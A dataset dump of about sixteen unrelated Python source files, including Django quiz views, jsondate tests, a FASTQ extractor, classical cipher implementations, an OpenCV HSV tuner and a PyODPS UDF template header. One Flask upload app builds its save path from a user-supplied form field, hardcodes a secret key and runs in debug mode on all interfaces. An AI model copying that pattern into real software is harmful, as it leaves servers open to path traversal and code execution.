index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
998,300 | 9d4e40c95c9841e953e810458722920d3ed67ec7 | import datetime
import json
import unittest
import six
import jsondate
class RoundTripCases(object):
def _test_roundtrip(self, input, expected=None, test_types=False):
output = self.roundtrip(input)
expected = expected if expected else input
self.assertEqual(output, expected)
return output
def test_empty(self):
self._test_roundtrip({})
def test_none(self):
self._test_roundtrip(dict(foo=None))
def test_datetime(self):
orig_dict = dict(created_at=datetime.datetime(2011, 1, 1))
self._test_roundtrip(orig_dict)
def test_date(self):
orig_dict = dict(created_at=datetime.date(2011, 1, 1))
self._test_roundtrip(orig_dict)
def test_datelike_string(self):
"A string that looks like a date *will* be interpreted as a date."
orig_dict = dict(created_at='2011-01-01')
expected = dict(created_at=datetime.date(2011, 1, 1))
self._test_roundtrip(orig_dict, expected)
@staticmethod
def _strdict(T):
return { T('foo'): T('bar'), T('empty'): T('') }
def _test_string_roundtrips(self, intype, outtype):
input = self._strdict(intype)
expected = self._strdict(six.text_type)
output = self._test_roundtrip(input, expected)
for k, v in six.iteritems(output):
self.assertEqual(type(k), outtype)
self.assertEqual(type(v), outtype)
def test_str_roundtrips(self):
self._test_string_roundtrips(str, six.text_type)
def test_unicode_roundtrips(self):
self._test_string_roundtrips(six.text_type, six.text_type)
class DumpsLoadsTests(RoundTripCases, unittest.TestCase):
@staticmethod
def roundtrip(input):
return jsondate.loads(jsondate.dumps(input))
class DumpLoadTests(RoundTripCases, unittest.TestCase):
@staticmethod
def roundtrip(input):
fileobj = six.StringIO()
jsondate.dump(input, fileobj)
fileobj.seek(0)
return jsondate.load(fileobj)
class UnexpectedTypeTests(unittest.TestCase):
def test_unexpected_type_raises(self):
dict_ = {'foo': set(['a'])}
with self.assertRaises(TypeError):
jsondate.dumps(dict_)
|
998,301 | dfe9741b1f205802be97de6968f1f4bf8131b229 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class MyUser(User):
def __unicode__(self):
return self.get_full_name()
class MyFile(models.Model):
file_name = models.CharField(max_length=50)
user = models.ForeignKey(User)
shortlink = models.CharField(max_length=200)
def __unicode(self):
return self.shortlink
|
998,302 | 91b6e3e016c7c2623aef20759cea215f892da4af | #!/usr/bin/env python
import sys
import argparse
from itertools import izip_longest
def anabl_getSeqsFromFastX(fn, X=2):
it = open(fn)
for head in it:
try:
yield (head.strip(), tuple(map(lambda x:x.strip(),
([it.next() for i in xrange(X - 1)]))))
except:
break
pass
it.close()
pass
def getFastqIdentifier(string):
if string.endswith('/1') or string.endswith('/2'):
return string[1:-2]
else:
return string.split()[0][1:]
def extractSequences(inR1, outR1, keepSequences, inR2=None, outR2=None, fmt='fq', overwrite='ab'):
fastx = 4 if fmt == 'fq' else 2
fwdOut = open(outR1, overwrite)
fwdGen = anabl_getSeqsFromFastX(inR1, X=fastx)
revOut, revGen = None, None
revSid, revSeq = None, None
if inR2 is not None and outR2 is not None:
revOut = open(outR2, overwrite)
revGen = anabl_getSeqsFromFastX(inR2, X=fastx)
fqid1, fqid2 = None, None
#print fwdOut is None, fwdGen is None, revOut is None, revGen is None
#sys.exit(1)
seqCounter = 0
while True:
try:
fwdSid, fwdSeq = fwdGen.next()
fqid1 = getFastqIdentifier(fwdSid)
if revGen is not None:
revSid, revSeq = revGen.next()
fqid2 = getFastqIdentifier(revSid)
except:
sys.stderr.write("Broke out of main loop after %i sequences.\n%i sequences still not found." % (seqCounter, len(keepSequences)))
break
seqCounter += 1
if fqid1 != fqid2 and fqid2 is not None:
sys.stderr.write('Error: fqid-mismatch %s %s.\n' % (fqid1, fqid2))
sys.exit(1)
if fqid1 in keepSequences:
keepSequences.difference_update(set([fqid1]))
fwdOut.write(('%s\n' * fastx) % ((fwdSid,) + fwdSeq))
if revOut is not None:
revOut.write(('%s\n' * fastx) % ((revSid,) + revSeq))
else:
pass
fwdOut.close()
if revOut is not None:
revOut.close()
#open(inR1 + '.missing', 'wb').write('\n'.join([id_ for id_ in keepSequences]))
pass
def main(argv):
descr = ''
parser = argparse.ArgumentParser(description=descr)
parser.add_argument('--in1', help='The r1-file (single-end reads or left paired-end reads).')
parser.add_argument('--in2', help='The r2-file (right paired-end reads)')
parser.add_argument('--input-format', help='Input sequences stored in fa or fq file(s).', default='fq')
parser.add_argument('--out1', type=str, help='The r1-output file.')
parser.add_argument('--out2', type=str, help='The r2-output file.')
parser.add_argument('--keep', type=str, help='List (file) of sequence identifies to keep.')
args = parser.parse_args()
#print args.keep
#print keepSequences
#return None
inputs1, inputs2 = args.in1.split(','), [None]
if 'in2' in args:
inputs2 = args.in2.split(',')
# print inputs1, inputs2
# return None
keepSequences = set([sid.strip() for sid in open(args.keep)])
for in1, in2 in izip_longest(inputs1, inputs2):
print in1, in2
extractSequences(in1, args.out1, keepSequences, inR2=in2, outR2=args.out2)
open(args.keep + '.missing', 'wb').write('\n'.join([id_ for id_ in keepSequences]))
"""
wanted = set([sid.strip() for sid in open(sys.argv[2])])
total = len(wanted)
extracted = set()
for sid, seq, sep, qual in anabl_getSeqsFromFastX(sys.argv[1]):
found
for sid, seq in anabl_getContigsFromFASTA(sys.argv[1]):
found = False
for wid in wanted:
if sid.startswith(wid):
found = True
break
if found:
wanted.difference_update(set([wid]))
extracted.add(wid)
sys.stdout.write('>%s\n%s\n' % (sid, seq))
if wanted:
sys.stderr.write('%i sequence(s) were not found in %s.\n' % (len(wanted), sys.argv[1]))
for sid in wanted:
sys.stderr.write('%s\n' % sid)
"""
main(sys.argv[1:])
|
998,303 | 57a3d3b13077b49ad800032040eb6d0d91e54f46 | from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render, redirect, get_object_or_404, reverse
from django.contrib import messages
from django.urls import reverse_lazy
from .models import Quiz, Quiz_Question, Choice, StudentAnswer, TakenQuiz, StudentAttemptedList
from django.views.generic import ListView, CreateView, DeleteView
from django.db.models import Count, Sum
from django.utils import timezone
import datetime
from .forms import AddQuizForm, QuestionModelForm, TakeQuizForm, ChoiceFormset
class Baseview(LoginRequiredMixin, ListView):
model = Quiz
context_object_name = 'quizes'
template_name = 'quiz/quiz_stud.html'
paginate_by = 10
def get_queryset(self):
user = self.request.user
sub = user.subjects.all()
queryset = Quiz.objects.filter(subject__in=sub)
return queryset
class Quizconf(LoginRequiredMixin, ListView):
model = Quiz
context_object_name = 'quizes'
template_name = 'quiz/quiz_conf.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
user = self.request.user
context['user'] = user
query = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
context['qcount'] = Quiz_Question.objects.filter(quiz=query).count()
try:
query = get_object_or_404(StudentAttemptedList, user=user)
if query.quizzes.filter(pk=self.kwargs.get('pk')).exists():
context['check'] = 0
else:
context['check'] = 1
except:
context['check'] = 1
return context
def get_queryset(self):
queryset = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
return queryset
class NewQuiz(LoginRequiredMixin, CreateView):
model = Quiz
form_class = AddQuizForm
template_name = 'quiz/new_quiz.html'
def render_to_response(self, context):
user = self.request.user
if user.user_type == 'student':
return redirect('quiz:quiz_home')
return super(NewQuiz, self).render_to_response(context)
def form_valid(self, form):
quiz = form.save(commit=False)
quiz.owner = self.request.user
quiz.save()
return redirect('quiz:question_add', pk=quiz.pk)
def get_form_kwargs(self):
kwargs = super(NewQuiz,self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
class TakenQuizListView(LoginRequiredMixin, ListView):
model = TakenQuiz
context_object_name = 'taken_quizzes'
template_name = 'quiz/taken_quiz.html'
paginate_by = 5
def render_to_response(self, context):
user=self.request.user
if user.user_type == 'teacher':
return redirect('quiz:quiz_home')
return super(TakenQuizListView, self).render_to_response(context)
def get_queryset(self):
user = self.request.user
queryset = TakenQuiz.objects.filter(student__user=user)\
.annotate(qcount=Count('quiz__questions'))\
.order_by('quiz__name')
return queryset
class Quizresultview(LoginRequiredMixin, ListView):
model = TakenQuiz
context_object_name = "taken_quizs"
template_name = "quiz/quiz_result.html"
def render_to_response(self, context):
user = self.request.user
if user.user_type == 'student':
return redirect('quiz:quiz_home')
return super(Quizresultview, self).render_to_response(context)
def queryset(self):
query = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
queryset = TakenQuiz.objects.filter(quiz=query)
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
ques = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
context['qcount'] = Quiz_Question.objects.filter(quiz=ques).count()
return context
class QuizDeleteView(LoginRequiredMixin, DeleteView):
model = Quiz
context_object_name = 'quiz'
template_name = 'quiz/quiz_delete_confirm.html'
success_url = reverse_lazy('quiz:quiz_home')
def render_to_response(self, context):
user = self.request.user
quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
if quiz.owner != user:
return redirect('quiz:quiz_home')
return super(QuizDeleteView, self).render_to_response(context)
def delete(self, request, *args, **kwargs):
return super().delete(request, *args, **kwargs)
def get_queryset(self):
queryset = Quiz.objects.filter(pk=self.kwargs.get('pk'))
return queryset
class QuestionDeleteView(LoginRequiredMixin, DeleteView):
model = Quiz_Question
context_object_name = "quest"
template_name = "quiz/question_delete_confirm.html"
pk_url_kwarg = 'ques_pk'
def render_to_response(self, context):
user = self.request.user
quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
if quiz.owner != user:
return redirect('quiz:quiz_home')
return super(QuestionDeleteView, self).render_to_response(context)
def get_context_data(self, **kwargs):
question = self.get_object()
kwargs['quiz'] = question.quiz
return super().get_context_data(**kwargs)
def delete(self, request, *args, **kwargs):
return super().delete(request, *args, **kwargs)
def get_queryset(self):
queryset = Quiz_Question.objects.filter(pk=self.kwargs.get('ques_pk'))
return queryset
def get_success_url(self):
question = self.get_object()
return reverse('quiz:question_list', kwargs={'pk': question.quiz_id})
class QuestionListView(LoginRequiredMixin, ListView):
model = Quiz_Question
template_name = "quiz/question_list.html"
context_object_name = "questions"
paginate_by = 8
def get_queryset(self):
quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
queryset = Quiz_Question.objects.filter(quiz=quiz)
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
context['quiz'] = quiz
context['choices'] = Choice.objects.filter(question__quiz=quiz)
context['now'] = timezone.now().date()
return context
class AfterQuizList(LoginRequiredMixin, ListView):
model = Quiz_Question
template_name = "quiz/after_quiz.html"
context_object_name = "questions"
def get_queryset(self):
quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
queryset = Quiz_Question.objects.filter(quiz=quiz)
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
quiz = get_object_or_404(Quiz, pk=self.kwargs.get('pk'))
context['quiz'] = quiz
context['choices'] = Choice.objects.filter(question__quiz=quiz)
context['answers'] = StudentAnswer.objects.filter(answer__question__quiz=quiz)
user = self.request.user
queryset = get_object_or_404(TakenQuiz, quiz=quiz, student__user=user)
context['scores'] = queryset
context['qcount'] = Quiz_Question.objects.filter(quiz=quiz).count()
return context
class QuizSearchResult(LoginRequiredMixin, ListView):
model = Quiz
context_object_name = 'quizes'
template_name = 'quiz/quiz_stud.html'
paginate_by = 10
def get_queryset(self):
user = self.request.user
sub = user.subjects.all()
queryset = Quiz.objects.filter(subject__in=sub)
query = self.request.GET.get('q')
if query:
queryset = queryset.filter(name__icontains=query)
return queryset
@login_required
def QuestionAdd(request, pk):
user = request.user
if user.user_type == 'student':
return redirect('quiz:quiz_home')
template_name = 'quiz/newques.html'
quiz = get_object_or_404(Quiz, pk=pk)
if request.method == 'GET':
questionform = QuestionModelForm(request.GET or None)
formset = ChoiceFormset(queryset=Choice.objects.none())
elif request.method == 'POST':
questionform = QuestionModelForm(request.POST)
formset = ChoiceFormset(request.POST)
if questionform.is_valid() and formset.is_valid():
question = questionform.save(commit=False)
question.quiz = quiz
question.save()
for form in formset:
choice = form.save(commit=False)
choice.question = question
choice.save()
return redirect('quiz:question_add', quiz.pk)
return render(request, template_name, {
'questionform': questionform,
'quiz': quiz,
'formset': formset,
})
@login_required
def TakeQuiz(request, pk):
user = request.user
if user.user_type == 'teacher':
return redirect('quiz:quiz_home')
try:
StudentAttemptedList.objects.create(user=user)
except:
query = get_object_or_404(StudentAttemptedList, user=user)
query = get_object_or_404(StudentAttemptedList, user=user)
if query.quizzes.filter(pk=pk).exists():
return redirect('quiz:taken_quiz_list')
quiz = get_object_or_404(Quiz, pk=pk)
if (quiz.date != timezone.now().date()):
messages.warning(request, "Attempt on the date")
return render(request, 'quiz/quiz_error.html')
total_questions = quiz.questions.count()
unanswered_questions = query.get_unanswered_questions(quiz)
total_unanswered_questions = unanswered_questions.count()
question = unanswered_questions.first()
if request.method == 'POST':
form = TakeQuizForm(question=question, data=request.POST)
if form.is_valid():
student_answer = form.save(commit=False)
student_answer.student = query
student_answer.save()
if query.get_unanswered_questions(quiz).exists():
return redirect('quiz:takequiz', pk)
else:
correct_answers = query.quiz_answers.filter(answer__question__quiz=quiz, answer__is_correct=True).count()
TakenQuiz.objects.create(student=query, quiz=quiz, score=correct_answers)
user.score = TakenQuiz.objects.filter(student=query).aggregate(Sum('score'))['score__sum']
user.save()
return redirect('quiz:after_quiz', pk)
else:
form = TakeQuizForm(question=question)
return render(request, 'quiz/take_quiz_form.html', {
'quiz': quiz,
'question': question,
'form': form,
'answered_questions': total_questions - total_unanswered_questions,
'total_questions': total_questions
})
|
998,304 | b85a2acb48ec21b69bdeec29d68a1b1b24544596 | import gps
# Listen on port 2947 (gpsd) of localhost
session = gps.gps("localhost", "2947")
session.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)
while True:
try:
report = session.next()
# Wait for a 'TPV' report and display the current time
# To see all report data, uncomment the line below
#print report
if report['class'] == 'TPV':
report.time = str(report.time)
report.device = str(report.device)
report.lon = str(report.lon)
report.lat = str(report.lat)
report.mode = str(report.mode)
report.eps = str(report.eps)
report.epx = str(report.epx)
report.epy = str(report.epy)
report.epv = str(report.epv)
report.speed = str(report.speed)
tosave = report.time + "," + report.device + "," + report.lon + "," + report.lat + "," + report.mode + "," + report.eps + "," + report.epx + "," + report.epy + "," + report.epv + "," + report.speed + "\n"
f = open('test.txt', 'a') #create a file using the given input
f.write(tosave)
f.close()
#
#if hasattr(report, 'time'):
# print report.time
#if hasattr(report, 'device'):
# print report.device
#if hasattr(report, 'lon'):
# print report.lon
# if hasattr(report, 'lat'):
# print report.lat
# if hasattr(report, 'mode'):
# print report.mode
# if hasattr(report, 'eps'):
# print report.eps
# if hasattr(report, 'epx'):
# print report.epx
# if hasattr(report, 'epy'):
# print report.epy
# if hasattr(report, 'epv'):
# print report.epv
# if hasattr(report, 'speed'):
# print report.speed
except KeyError:
pass
except KeyboardInterrupt:
quit()
except StopIteration:
session = None
print "GPSD has terminated"
|
998,305 | c8c26ba5efb9e2b5d9e5cab4be9c938b13d0488e | # used for string manipulations :
# to verify string matches a particular pattern or not
# for substitution in a string
import re
pattern = r"eggs" # r is raw string which contains "eggs"
# match() acually compares or match two strings
if re.match(pattern, "eggszzzzzzz"): # string should match in beginning.
print("match found")
else:
print("no match found")
# search()
if re.search(pattern, "zzzzeggszzzz"): # return true when pattern found anywhere in a string
print("match found")
else:
print("no match found")
# findall() used to print out matched pattern
print(re.findall(pattern, "zzzzeggszzzz"))
# EXAMPLE PROBLEM :
string = "My name is John, John is cool"
pattern = r"John"
# replace all occuranceof john with another string :
newstring = re.sub(pattern, "Hitesh", string)
print(newstring) |
998,306 | 944d116e1568f52f5624b68886ac7d7d169c6ed0 | import string
import random
ALPHABET = string.ascii_uppercase
def readfile(file):
f=open(file, mode='r')
message=''
for ch in f.read():
if 65 <= ord(ch) <= 90 or 97 <= ord(ch) <= 122:
message+=ch.upper()
f.close()
return message
#Build shifted alphabet
def offset(char, offset):
return ALPHABET[(ALPHABET.index(char)+offset)%26]
class Caesar:
@staticmethod
def encrypt(message, key):
return ''.join(map(offset, list(message), [key,]*len(message)))
@staticmethod
def decrypt(ciphertext, key):
return ''.join(map(offset, list(ciphertext), [26-key,]*len(ciphertext)))
class Vigenere:
@staticmethod
def encrypt(message, key):
return ''.join(map(offset, message, list(map(lambda x: ALPHABET.index(x), key))*(len(message)//len(key)+1)))
@staticmethod
def decrypt(ciphertext, key):
return ''.join(map(offset, ciphertext, list(map(lambda x: 26-ALPHABET.index(x), key))*(len(ciphertext)//len(key)+1)))
class Substitution:
@staticmethod
def encrypt(message, key):
cipher_alph = Substitution.buildAlphabet(key)
return ''.join(cipher_alph[ALPHABET.index(ch.upper())] for ch in message)
#Built substitution alphabet by key
@staticmethod
def buildAlphabet(key):
offseted_alph = ''.join(map(offset, list(ALPHABET), [ALPHABET.index(key.upper()[-1])+1,]*len(ALPHABET)))
return (key.upper()+''.join([ch for ch in offseted_alph if not (ch in key.upper())]))
@staticmethod
def decrypt(ciphertex, key):
cipher_alph = Substitution.buildAlphabet(key)
return ''.join(ALPHABET[cipher_alph.index(ch.upper())] for ch in ciphertex)
class Affine:
@staticmethod
def modReverse(a, b):
r, s, t = [min(a, b), max(a, b)], [1, 0], [0,1]
while r[-1]!=1:
q = r[-2]//r[-1]
r.append(r[-2]-q*r[-1])
s.append(s[-2]-q*s[-1])
t.append(t[-2]-q*t[-1])
return (s[-1]%r[1])
#key should be the tuple
@staticmethod
def encrypt(message, key):
return ''.join(ALPHABET[(ALPHABET.index(ch)*key[0]+key[1])%26] for ch in message)
#key should be the tuple
@staticmethod
def decrypt(ciphertext, key):
try:
return ''.join(ALPHABET[Affine.modReverse(key[0], 26)*(ALPHABET.index(ch)-key[1])%26] for ch in ciphertext)
except ZeroDivisionError:
pass
if __name__=='__main__':
#Caesar test
print('---Caesar---')
test = 'DEFENDTHEEASTWALLOFTHECASTLE'
k = 1
c = Caesar.encrypt(test, k)
d = Caesar.decrypt(c, k)
print(c)
print(d)
#Vigenere test
print('---Vigenere---')
test = 'DEFENDTHEEASTWALLOFTHECASTLE'
c = Vigenere.encrypt(test, 'FORTIFICATION'.upper())
d = Vigenere.decrypt(c, 'FORTIFICATION'.upper())
print(c)
print(d)
#Substitution test
print('---Substitution---')
test='DEFENDTHEEASTWALLOFTHECASTLE'
c = Substitution.encrypt(test, 'zebra')
print(c)
d = Substitution.decrypt(c, 'zebra')
print(d)
#Affine test
print('---Affine---')
test = 'DEFENDTHEEASTWALLOFTHECASTLE'
c = Affine.encrypt(test, (5, 7))
print(c)
d = Affine.decrypt(c, (5, 7))
print(d) |
998,307 | e84b317eb2e3bfac4c86f96253da7d356b012497 | from functools import lru_cache
class Solution:
def maxA(self, n: int) -> int:
# basically we have 2 moves:
# 1 move: count+1
# 3 moves: copy-paste
# at least need 3 moves to do copy-paste, then we can paste as many as we want
# use top-down DP
# dp[n] is the solution of n
@lru_cache
def dp(x):
if x <= 6: return x
res = x
for i in range(x-2): # max i = x-3
res = max(res, dp(i)*(x-i-1))
return res
return dp(n)
|
998,308 | f08dd7d45c5a10fbb33578524779ea2e334fbf17 | #!/usr/bin/env python
# encoding: utf-8
from mvpa2.clfs.knn import kNN
from mvpa2.measures.base import CrossValidation
from pulse.lda import lda
import numpy as np
def reduce_dim(labels, samples):
return lda(np.array(samples), np.array(labels), 2)
def cv_kNN(data_set, partitioner):
clf = kNN(12)
clf.set_postproc(None)
cv = CrossValidation(clf, partitioner)
cv_results = cv(data_set)
return np.mean(cv_results)
def train_kNN(data_set):
clf = kNN(12)
clf.train(data_set)
return clf
|
998,309 | 1696c4b21b6a01f6a0d7c18a4cdd6b8a006311b8 | # **** Book class ****
class Book:
# **** constructor method ****
def __init__(self, title, author=None):
self.title = title
self.author = author
# **** print info about the book ****
def print_info(self):
print(self.title + " is written by " + self.author)
#print(f"{self.title} is written by {self.author}")
# **** representation of a book (equivalent to toString in Java) ****
def __repr__(self):
return self.title
|
998,310 | 78f46fe8537e2b35b2ae7851a3eaa6c589b4a10d | #! /usr/bin/python3
from Metadata import Metadata
from ImageSynchronizer import ImageSynchronizer
import numpy as np
import matplotlib.pyplot as plt
tokamak = Metadata()
tokamak.parse_metadata('tokamak/dataformat.txt','tokamak/tokamak.txt')
x_tokamak = tokamak.get_nparray('x')
y_tokamak = tokamak.get_nparray('y')
fig1 = plt.figure()
plt.plot(x, y, label="robot position")
plt.legend(loc="upper right")
plt.xlabel("East (m)")
plt.ylabel("North (m)")
plt.gca().set_aspect('equal', adjustable='box')
plt.show(block=False)
|
998,311 | cd2a072ee5a67466de8551647b0b3eea7b14b36d | import cv2
import numpy as np
framewidth = 640
frameheight = 480
cap = cv2.VideoCapture(0)
cap.set(3,framewidth)
cap.set(4,frameheight)
def empty(a):
pass
#create Tackbar
cv2.namedWindow("HSV")
cv2.resizeWindow("HSV",641,240)
cv2.createTrackbar("HUE Min","HSV",0,179,empty) #here empty is a simple funtion
cv2.createTrackbar("HUE Max","HSV",179,179,empty)
cv2.createTrackbar("SAT Min","HSV",0,255,empty)
cv2.createTrackbar("SAT Max","HSV",255,255,empty)
cv2.createTrackbar("VALUE Min","HSV",0,255,empty)
cv2.createTrackbar("VALUE Max","HSV",255,255,empty)
while True:
ret,img = cap.read()
imgHsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
#get a range of colors
#Getting each values from trackbar
h_min = cv2.getTrackbarPos("HUE Min","HSV")
h_max = cv2.getTrackbarPos("HUE Max","HSV")
s_min = cv2.getTrackbarPos("SAT Min","HSV")
s_max = cv2.getTrackbarPos("SAT Max","HSV")
v_min = cv2.getTrackbarPos("VALUE Min","HSV")
v_max = cv2.getTrackbarPos("VALUE Max","HSV")
#Putting values in matrixs
lower = np.array([h_min,s_min,v_min])
upper = np.array([h_max,s_max,v_max])
#create mask from these values
mask =cv2.inRange(imgHsv,lower,upper)
result = cv2.bitwise_and(img,img, mask = mask)
#convert color Gray into BGR
mask = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
#stack images
hStack = np.hstack([img,mask,result])
#cv2.imshow("image",img)
#cv2.imshow("HSVimg",imgHsv)
#cv2.imshow("Mask", mask)
#cv2.imshow("Result", result)
hStack = cv2.resize(hStack,(0,0),fx=0.5,fy=0.5)
cv2.imshow("stacked",hStack)
if cv2.waitKey(1) == ord('q'):
break
cap.release()
cv2.destroyAllWindows() |
998,312 | 2023b041b362f3d48a71e6c24f3a963a30278607 | from flask import Flask, url_for, flash ,redirect, render_template, request, abort
from scoring import scoring
import json
app = Flask(__name__)
app.secret_key = "dsfajkl23@!fesjkl#"
scr = scoring()
@app.route("/")
def index():
rankings = scr.read_rank()
return render_template("index.html", rankings = rankings)
@app.route("/upload", methods=["POST"])
def upload():
if request.method == "POST":
s_id = (request.form["register_name"])
f = request.files["csv_file"]
user_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
if f.headers["Content-Type"]=="text/csv":
path = f"./reported/{s_id}.csv"
f.save(path)
message = scr.write(path, s_id, f.filename, user_ip)
flash(message)
else:
flash("CSV파일이 아닙니다. CSV파일을 제출해주세요.")
else:
abort(404)
return redirect(url_for("index"))
if __name__ == "__main__":
app.run(debug=True, port=3000, host="0.0.0.0", threaded=True) |
998,313 | 5247b51b7a23a5abd04dcc7482f4de49f2b93e9a | # Title: 카드2
# Link: https://www.acmicpc.net/problem/2164
import sys
from collections import deque as dq
sys.setrecursionlimit(10 ** 6)
read_single_int = lambda: int(sys.stdin.readline().strip())
def solution(n: int):
d = dq([i for i in range(1, n+1)])
while len(d) > 1:
d.popleft()
d.append(d.popleft())
return d[0]
def main():
n = read_single_int()
print(solution(n))
if __name__ == '__main__':
main() |
998,314 | a226a3dd236d5d9f89ff5caa577be716af30ff36 | from django.contrib import admin
from mailing.models import SystemEmail
from djcelery.models import TaskState, WorkerState, PeriodicTask, IntervalSchedule, CrontabSchedule
@admin.register(SystemEmail)
class SystemEmailAdmin(admin.ModelAdmin):
pass
admin.site.unregister(TaskState)
admin.site.unregister(WorkerState)
admin.site.unregister(IntervalSchedule)
admin.site.unregister(CrontabSchedule)
admin.site.unregister(PeriodicTask)
|
998,315 | 096ed24c2195c91ae8938ecfeabab760afef7993 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2022 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import inspect
import os
import platform
import sys
import uuid
from collections import OrderedDict
from .types import df_type_to_odps_type
from ...expr.collections import RowAppliedCollectionExpr
from ...expr.element import MappedExpr
from ...expr.reduction import Aggregation, GroupedAggregation
from ...expr.utils import get_executed_collection_project_table_name
from ...utils import make_copy
from ....config import options
from ....lib import cloudpickle
from ....compat import six
from ....models import FileResource, TableResource, ArchiveResource
from ....utils import to_str
dirname = os.path.dirname(os.path.abspath(cloudpickle.__file__))
CLOUD_PICKLE_FILE = os.path.join(dirname, 'cloudpickle.py')
with open(CLOUD_PICKLE_FILE) as f:
CLOUD_PICKLE = f.read()
IMPORT_FILE = os.path.join(dirname, 'importer.py')
with open(IMPORT_FILE) as f:
MEM_IMPORT = f.read()
CLIENT_IMPL = '(%d, %d, "%s")' % (sys.version_info[0],
sys.version_info[1],
platform.python_implementation().lower())
X_NAMED_TUPLE_FILE = os.path.join(dirname, 'xnamedtuple.py')
with open(X_NAMED_TUPLE_FILE) as f:
X_NAMED_TUPLE = f.read()
UDF_TMPL_HEADER = '''\
%(cloudpickle)s
%(memimport)s
%(xnamedtuple)s
try:
# workaround for character not in range error
import _strptime
except:
pass
import sys
# avoid conflict between protobuf binaries
sys.setdlopenflags(10)
import base64
import inspect
import time
import os
try:
import faulthandler
faulthandler.enable(all_threads=True)
except ImportError:
pass
from odps.udf import annotate
from odps.distcache import get_cache_file, get_cache_table, get_cache_archive
PY2 = sys.version_info[0] == 2
try:
from odps.distcache import get_cache_archive_filenames
except ImportError:
def get_cache_archive_filenames(name, relative_path='.'):
from odps.distcache import WORK_DIR, DistributedCacheError
def _is_parent(parent, child):
return parent == child or child.startswith(parent + '/')
if os.path.split(name)[0] != '':
raise DistributedCacheError("Invalid resource name: " + name)
ret_files = []
# find the real resource path to avoid the symbol link in inner system
resourcepath = os.path.realpath(os.path.join(WORK_DIR, name))
# use realpath == abspath to check the symbol link
dirpath = os.path.join(resourcepath, relative_path)
if not os.path.exists(dirpath):
raise DistributedCacheError("Invalid relative path, file not exists: " + relative_path)
if os.path.realpath(dirpath) != os.path.abspath(dirpath):
raise DistributedCacheError("Invalid relative path, relative path contains symlink: " + relative_path)
if not _is_parent(resourcepath, dirpath):
raise DistributedCacheError("Invalid relative path, path not correct in archive: " + relative_path)
if not os.path.isdir(dirpath):
return [dirpath]
for root, dirs, files in os.walk(dirpath):
for f in dirs:
filename = os.path.join(root, f)
if os.path.islink(filename):
relativename = os.path.relpath(filename, resourcepath)
raise DistributedCacheError("Invalid relative path, relative path contains symlink: " + relativename)
for f in files:
filename = os.path.join(root, f)
if os.path.islink(filename):
relativename = os.path.relpath(filename, resourcepath)
raise DistributedCacheError("Invalid relative path, relative path contains symlink: " + relativename)
ret_files.append(filename)
return ret_files
def get_cache_archive_data(name, relative_path='.'):
try:
return [os.path.normpath(f) for f in get_cache_archive_filenames(name, relative_path)]
except RuntimeError:
return {os.path.normpath(fo.name): fo for fo in get_cache_archive(name, relative_path)}
class UnbufferedStream(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
if attr != 'stream':
return getattr(self.stream, attr)
else:
return object.__getattribute__(self, 'stream')
def __setattr__(self, attr, value):
if attr != 'stream':
return setattr(self.stream, attr, value)
else:
return object.__setattr__(self, 'stream', value)
sys.stdout = UnbufferedStream(sys.stdout)
try:
import socket
except ImportError:
class MockSocketModule(object):
_GLOBAL_DEFAULT_TIMEOUT = object()
def __getattr__(self, item):
raise AttributeError('Accessing attribute `{0}` of module `socket` is prohibited by sandbox.'.format(item))
sys.modules['socket'] = MockSocketModule()
def gen_resource_data(fields, tb):
named_args = xnamedtuple('NamedArgs', fields)
for args in tb:
yield named_args(*args)
def read_lib(lib, f):
if isinstance(f, (list, dict)):
return f
if lib.endswith('.zip') or lib.endswith('.egg') or lib.endswith('.whl'):
if PY2 and hasattr(f, "read"):
return zipfile.ZipFile(f)
else:
return zipfile.ZipFile(f.name)
if lib.endswith('.tar') or lib.endswith('.tar.gz') or lib.endswith('.tar.bz2'):
from io import BytesIO
if lib.endswith('.tar'):
mode = 'r'
else:
mode = 'r:gz' if lib.endswith('.tar.gz') else 'r:bz2'
if PY2 and hasattr(f, "read"):
return tarfile.open(name='', fileobj=f, mode=mode)
else:
return tarfile.open(name=f.name, mode=mode)
if lib.endswith('.py'):
if PY2 and hasattr(f, "read"):
return {f.name: f}
else:
return {f.name: open(f.name, 'rb')}
raise ValueError(
'Unknown library type which should be one of zip(egg, wheel), tar, or tar.gz')
# Use this method to make testThirdPartyLibraries happy
np_generic = None
def load_np_generic():
global np_generic
try:
from numpy import generic
np_generic = generic
except ImportError:
class PseudoNpGeneric(object):
pass
np_generic = PseudoNpGeneric
''' % {
'cloudpickle': CLOUD_PICKLE,
'memimport': MEM_IMPORT,
'xnamedtuple': X_NAMED_TUPLE,
}
